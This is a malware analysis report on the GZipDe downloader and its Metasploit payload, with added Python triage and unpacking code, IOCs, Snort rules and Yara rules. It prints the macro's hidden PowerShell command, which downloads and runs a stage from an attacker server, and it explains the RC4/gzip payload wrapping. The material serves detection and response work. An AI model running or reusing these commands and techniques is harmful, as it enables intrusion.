GZipDe: An Encrypted Downloader Serving Metasploit

[ This article was originally published by AlienVault Labs ]

At the end of May a Middle Eastern news network published an article about the upcoming Shanghai Cooperation Organization Summit. A week ago, AlienVault Labs detected a new malicious document targeting the region. It uses a piece of text taken from that report as a decoy (the original article shows the decoy document as a screenshot, which is not reproduced here).

This is the first step of a multistage infection involving several servers and artifacts. Although the final goal appears to be the installation of a Metasploit backdoor, along the way we found an interesting .NET downloader that wraps its shellcode in an extra encryption layer to keep the payload out of static signatures and evade antivirus detection.

Malicious Document

The file, which was uploaded to VirusTotal by a user in Afghanistan, is a Microsoft Word document (.doc) carrying macro malware. When opened, it runs a Visual Basic script stored as a hexadecimal stream, which registers a scheduled task that fires every minute and launches PowerShell with a hidden window:

'C:\Windows\System32\schtasks.exe' /Create /sc MINUTE /MO 1 /TN WindowsUpdate /TR 'Powershell -W Hidden (New-Object System.Net.WebClient).DownloadFile('http://118.193.251[.]137/dropbox/?p=BT67HU78HZ','$env:public\svchost325.vbs');(New-Object -com Shell.Application).ShellExecute('$env:public\svchost325.vbs');' /F

The PowerShell command fetches the next stage over plain HTTP from the following URL, writes it to %PUBLIC%\svchost325.vbs and runs it through Shell.Application.ShellExecute:

http://118.193.251[.]137/dropbox/?p=BT67HU78HZ

We are missing the next step of the infection chain as the server is now offline.

Based on the shared path on the same server, we believe the following file is related and may be one of the later infection stages: http://118.193.251[.]137/dropbox/filesfhjdfkjsjdkfjsdkfjsdfjksdfjsdkfasdfjnadsfjnasdnj/utorrent.exe.
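As an added triage example (not code from the original article), the following Python parses the schtasks command line quoted above, as it would appear in a process-creation log, and pulls out what a responder needs: the task name and trigger, the download URL (defanged), the drop path, and the traits the USM correlation rules in the appendix key on. The command string is a constructed copy with backslashes restored; the field names and flag labels are this example's own.

```python
import re
from urllib.parse import urlparse

# Constructed copy of the macro's command line (backslashes restored), as it
# would be logged by a process-creation sensor such as Sysmon event ID 1.
TASK_CMD = (
    "'C:\\Windows\\System32\\schtasks.exe' /Create /sc MINUTE /MO 1 /TN WindowsUpdate "
    "/TR 'Powershell -W Hidden (New-Object System.Net.WebClient).DownloadFile("
    "'http://118.193.251.137/dropbox/?p=BT67HU78HZ','$env:public\\svchost325.vbs');"
    "(New-Object -com Shell.Application).ShellExecute('$env:public\\svchost325.vbs');' /F"
)

DOWNLOAD_RE = re.compile(r"DownloadFile\(\s*'([^']+)'\s*,\s*'([^']+)'\s*\)")
EXECUTE_RE = re.compile(r"ShellExecute\(\s*'([^']+)'\s*\)")


def defang(url):
    """Render the URL safe to paste into a report: 1.2.3.4 -> 1.2.3[.]4."""
    host = urlparse(url).hostname or ""
    if "." not in host:
        return url
    head, _, tail = host.rpartition(".")
    return url.replace(host, f"{head}[.]{tail}", 1)


def parse_schtasks(cmd):
    """Extract task metadata, the download/execute pair, and suspicious traits."""
    opts = {}
    for name, pat in (("schedule", r"/sc\s+(\w+)"),
                      ("modifier", r"/MO\s+(\d+)"),
                      ("task_name", r"/TN\s+(\S+)")):
        m = re.search(pat, cmd, re.IGNORECASE)
        opts[name] = m.group(1) if m else None

    # /TR holds the action; greedy match runs up to the closing quote before /F
    m = re.search(r"/TR\s+'(.*)'\s+/F", cmd, re.DOTALL)
    action = m.group(1) if m else ""
    opts["action"] = action

    dl = DOWNLOAD_RE.search(action)
    ex = EXECUTE_RE.search(action)
    opts["download_url"] = dl.group(1) if dl else None
    opts["dropped_path"] = dl.group(2) if dl else None
    opts["executed_path"] = ex.group(1) if ex else None

    flags = []
    if re.search(r"-W(indowStyle)?\s+Hidden", action, re.IGNORECASE):
        flags.append("hidden_powershell_window")
    if dl:
        flags.append("download_cradle")
    if dl and ex and ex.group(1) == dl.group(2):
        flags.append("executes_downloaded_file")
    if (opts["schedule"] or "").upper() == "MINUTE":
        flags.append("minute_trigger")
    if (opts["task_name"] or "").lower().startswith("windowsupdate"):
        flags.append("task_name_mimics_windows_update")
    opts["flags"] = flags
    opts["iocs"] = [defang(dl.group(1))] if dl else []
    return opts


if __name__ == "__main__":
    for k, v in parse_schtasks(TASK_CMD).items():
        print(f"{k}: {v}")
```

The every-minute trigger combined with the /F (force overwrite) switch is what keeps the dropper re-downloading the VBS stage; a hunt over scheduled-task creation events for a MINUTE schedule whose action contains a DownloadFile call and a hidden window is a reasonable generalisation of the three USM rules listed in the appendix.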

GZipDe – The Encrypted Downloader

The internal name of this malware is Gzipde, as revealed by the PDB path left in the binary from the attacker's build machine:

Documents\Visual Studio 2008\Projects\gzipde\gzipde\obj\Debug\gzipde.pdb

The original reverse-TCP loader is publicly available on GitHub (the NativePayload_Reverse_tcp project referenced in the Yara rule below); the attacker added an extra encryption layer on top of it. The payload is stored as a Base64 string named GZipDe which is gzip-compressed and encrypted with a symmetric-key algorithm, most likely to evade antivirus detection.

The key is hard-coded as an array of bytes (the original article shows its values in a screenshot that is not reproduced here).

After Base64 decoding and decompression, the data passes through a decryptor. The algorithm is RC4 with a 23-byte key.

The malware then allocates a new memory region with execute, read and write permissions (VirtualAlloc with PAGE_EXECUTE_READWRITE, both of which survive as strings and are used by the Yara rule below), copies the decrypted payload into it and starts a new thread with CreateThread to execute it.
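As an added example (not the malware's code and not the GitHub project's), here is the unwrapping described above written out in Python: Base64 decode, gunzip, then RC4 with a 23-byte key, using the same key-schedule/keystream split as the EncryptInitalize and EncryptOutput routines named in the Yara rule below. The key and payload are constructed stand-ins; the real key bytes and shellcode are not reproduced on this page, and the pack_gzipde helper exists only to build a test vector.

```python
import base64
import gzip
import hashlib


def rc4_init(key):
    """Key-scheduling step (what the EncryptInitalize routine does)."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    return s


def rc4_crypt(key, data):
    """Keystream generation XORed over data (the EncryptOutput routine).
    RC4 is symmetric, so the same call encrypts and decrypts."""
    s = rc4_init(key)
    i = j = 0
    out = bytearray()
    for b in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(b ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def unpack_gzipde(blob, key):
    """Undo the wrapping in the order the downloader does: Base64 -> gunzip -> RC4."""
    return rc4_crypt(key, gzip.decompress(base64.b64decode(blob)))


def pack_gzipde(payload, key):
    """Inverse of unpack_gzipde; used here only to build a test vector."""
    return base64.b64encode(gzip.compress(rc4_crypt(key, payload))).decode("ascii")


def triage(payload):
    """What to record about a decrypted blob before it goes anywhere near a sandbox."""
    return {
        "size": len(payload),
        "sha256": hashlib.sha256(payload).hexdigest(),
        "has_mz_header": payload[:2] == b"MZ",
    }


# Constructed 23-byte key and stand-in payload (assumptions, not the real values).
KEY = bytes(range(0x41, 0x41 + 23))
PAYLOAD = b"\x90" * 32 + b"CONSTRUCTED STAND-IN, NOT REAL SHELLCODE"
BLOB = pack_gzipde(PAYLOAD, KEY)

if __name__ == "__main__":
    decrypted = unpack_gzipde(BLOB, KEY)
    assert decrypted == PAYLOAD
    print(triage(decrypted))
```

When working on a real sample, lift the key bytes and the GZipDe string from the decompiled .NET assembly and feed them to unpack_gzipde; the decrypted buffer is the raw shellcode the loader hands to CreateThread, and hashing it at this point gives an indicator that survives any re-encryption of the wrapper.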

The downloader also imports WaitForSingleObject, a kernel32 wait function (not a C# class) reached through P/Invoke, which is why kernel32 is the assembly's only module reference. Called on the handle of the newly created thread it blocks the downloader until the shellcode finishes; called on a mutex it would stop more than one instance of the malware running at a time, avoiding unnecessary resource usage and extra network noise.

The decrypted payload is shellcode that contacts the server at 175.194.42[.]8. Although the server is no longer up, Shodan recorded it serving a Metasploit payload (the original article includes the Shodan screenshot, not reproduced here).

Metasploit is becoming a popular choice in targeted attacks.

The Metasploit payload

The server, 175.194.42[.]8, delivers a Metasploit payload: a Meterpreter DLL, a capable backdoor, fronted by loader shellcode. The blob keeps a valid DOS header, so it passes as an ordinary PE image, yet its first bytes are also executable instructions that hand control to the loader stub. Once running, Meterpreter can gather information about the system and contact the command and control server to receive further commands.

The stub maps the entire DLL into memory itself, without going through the Windows loader and without writing anything to disk; this technique is known as reflective DLL injection. From this point the attacker can push any further payload to escalate privileges and move laterally within the local network.

Thanks to Chris Doman and Jaime Blasco for collaboration.

Appendix

File-Hashes

https://otx.alienvault.com/indicator/file/faf003c38758cf70b12bc4899714833e4713096c8f66163e753b3f0e70f2ba28

https://otx.alienvault.com/indicator/file/148d280586de3a62d366c396c8bfedd6683a2e3eb1c3d956da57dbfc19d1983c

https://otx.alienvault.com/indicator/file/3932999be863d5844168e3bbb09ffc2f8d572a8f4a93946adb7e9c438f35c711


IP Addresses

118.193.251[.]137

175.194.42[.]8

URLs

http://118.193.251[.]137/dropbox/filesfhjdfkjsjdkfjsdkfjsdfjksdfjsdkfasdfjnadsfjnasdnj/utorrent.exe

http://118.193.251[.]137/dropbox/?p=BT67HU78HZ

Network Detection

Multi-purpose:

AV ATTACK_RESPONSE Metasploit Reverse Shell Verification (Echo)

ET ATTACK_RESPONSE Metasploit/Meterpreter – Sending metsrv.dll to Compromised Host

ET ATTACK_RESPONSE Metasploit Meterpreter Reverse HTTPS certificate

Dedicated:

alert http $HOME_NET any -> $EXTERNAL_NET any (msg:"AV TROJAN GZipDe MacroMalware CnC Checkin"; flow:established,to_server; content:"/dropbox/?p="; http_uri; depth:12; content:!"User-Agent|3a| "; http_header; content:!"Referer"; http_header; pcre:"/^\/dropbox\/\?p=[a-zA-Z0-9]*$/U"; reference:md5,951d9f3320da660593930d3425a9271b; classtype:trojan-activity; sid:xxx; rev:1;)

alert http $HOME_NET any -> $EXTERNAL_NET any (msg:"AV TROJAN GZipDe MacroMalware Payload Request"; flow:established,to_server; content:"/dropbox/file"; depth:13; http_uri; content:".exe"; http_uri; distance:0; isdataat:!1,relative; content:!"User-Agent|3a| "; http_header; content:!"Referer"; http_header; reference:md5,951d9f3320da660593930d3425a9271b; classtype:trojan-activity; sid:xxx; rev:1;)
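To make explicit what the two dedicated rules match and, just as importantly, what they deliberately skip, here is their logic re-implemented in Python over constructed HTTP requests. This is an added example, not part of the original article and not a replacement for the Snort rules; the request records are made up to mirror the appendix URLs and are not captured traffic.

```python
import re

# URI shape required by the check-in rule's pcre: /dropbox/?p=<alphanumeric token>
CHECKIN_URI = re.compile(r"^/dropbox/\?p=[a-zA-Z0-9]*$")


def _lacks_ua_and_referer(req):
    # Both rules negate these headers: System.Net.WebClient sends no User-Agent
    # unless the script sets one, whereas a browser hitting the same URL sends both.
    names = {h.lower() for h in req.get("headers", {})}
    return "user-agent" not in names and "referer" not in names


def match_checkin(req):
    """Equivalent of 'AV TROJAN GZipDe MacroMalware CnC Checkin'."""
    uri = req["uri"]
    return (uri.startswith("/dropbox/?p=")            # content ... depth:12
            and _lacks_ua_and_referer(req)
            and CHECKIN_URI.match(uri) is not None)    # pcre with the /U (URI) flag


def match_payload_request(req):
    """Equivalent of 'AV TROJAN GZipDe MacroMalware Payload Request'."""
    uri = req["uri"]
    return (uri.startswith("/dropbox/file")           # content ... depth:13
            and uri.endswith(".exe")                   # ".exe" with isdataat:!1,relative
            and _lacks_ua_and_referer(req))


def scan(requests):
    """Return (request id, rule name) for every request a rule would alert on."""
    hits = []
    for r in requests:
        if match_checkin(r):
            hits.append((r["id"], "CnC Checkin"))
        if match_payload_request(r):
            hits.append((r["id"], "Payload Request"))
    return hits


# Constructed requests: the two appendix URLs as WebClient would fetch them,
# plus two look-alikes the rules are written to ignore.
REQUESTS = [
    {"id": 1, "uri": "/dropbox/?p=BT67HU78HZ",
     "headers": {"Host": "118.193.251.137"}},
    {"id": 2, "uri": "/dropbox/filesfhjdfkjsjdkfjsdkfjsdfjksdfjsdkfasdfjnadsfjnasdnj/utorrent.exe",
     "headers": {"Host": "118.193.251.137"}},
    # same check-in URL, but from a browser: User-Agent and Referer present
    {"id": 3, "uri": "/dropbox/?p=BT67HU78HZ",
     "headers": {"Host": "118.193.251.137", "User-Agent": "Mozilla/5.0",
                 "Referer": "http://example.invalid/"}},
    # ".exe" is not the final byte of the URI, so isdataat:!1,relative fails
    {"id": 4, "uri": "/dropbox/files/utorrent.exe?x=1",
     "headers": {"Host": "118.193.251.137"}},
]

if __name__ == "__main__":
    for hit in scan(REQUESTS):
        print(hit)
```

Request 3 is the one to remember when tuning: an analyst who opens the check-in URL in a browser will not trigger the rule, because the negated header checks are what keep it quiet on ordinary web traffic.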

Unified Security Management (USM) Correlation Rules

  • System Compromise – Code Execution – Powershell Process Created by Office Word
  • Delivery & Attack – Suspicious Download – File Download via Office Macro
  • Environmental Awareness – Code Execution – Suspicious PowerShell Arguments

OTX Pulse: https://otx.alienvault.com/pulse/5b239254174e5d5edab34e05

Yara Rules

rule gzipde_hunt {
    meta:
        author = "AlienVault Labs"
        description = "Hunt rule to identify files related to Gzipde"
        copyright = "Alienvault Inc. 2018"
        reference = "https://otx.alienvault.com/pulse/5b239254174e5d5edab34e05"
    strings:
        $a = "118.193.251.137" nocase wide ascii
        $b = "BT67HU78HZ" nocase wide ascii
        $c = "2E0EB747-BE46-441A-A8B1-97AB27B49EC5" nocase wide ascii
        $d = "gzipde.pdb" nocase wide ascii
        $e = "C:\\Users\\jhon\\Documents\\Visual Studio 2008" nocase wide ascii
    condition:
        any of them
}

import "dotnet"

rule MeterpreterEncryptedPayloadDotNetGzipDE {
    meta:
        type = "malware"
        description = "GZipDe"
        author = "jblasco@alienvault.com"
        reference1 = "https://github.com/DamonMohammadbagher/NativePayload_Reverse_tcp/blob/master/NativePayload_Reverse_tcp.cs"
        reference2 = "https://otx.alienvault.com/indicator/file/33c03d94f75698fac6a39a5a6c328c2be4a079717520e0ec411597b9ca3a9bef"
    strings:
        $pdb = "gzipde.pdb"
        $st1 = "PAGE_EXECUTE_READWRITE"
        $st2 = "EncryptInitalize"
        $st3 = "EncryptOutput"
        $st4 = "CreateThread"
        $st5 = "VirtualAlloc"
    condition:
        uint16(0) == 0x5A4D and
        ((dotnet.typelib == "c1181bc0-0102-44e9-82ba-7c1ca7d24219" and
          dotnet.guids[0] == "2e0eb747-be46-441a-a8b1-97ab27b49ec5") or
         $pdb or
         (dotnet.number_of_modulerefs == 1 and
          dotnet.modulerefs[0] == "kernel32" and
          all of ($st*)))
}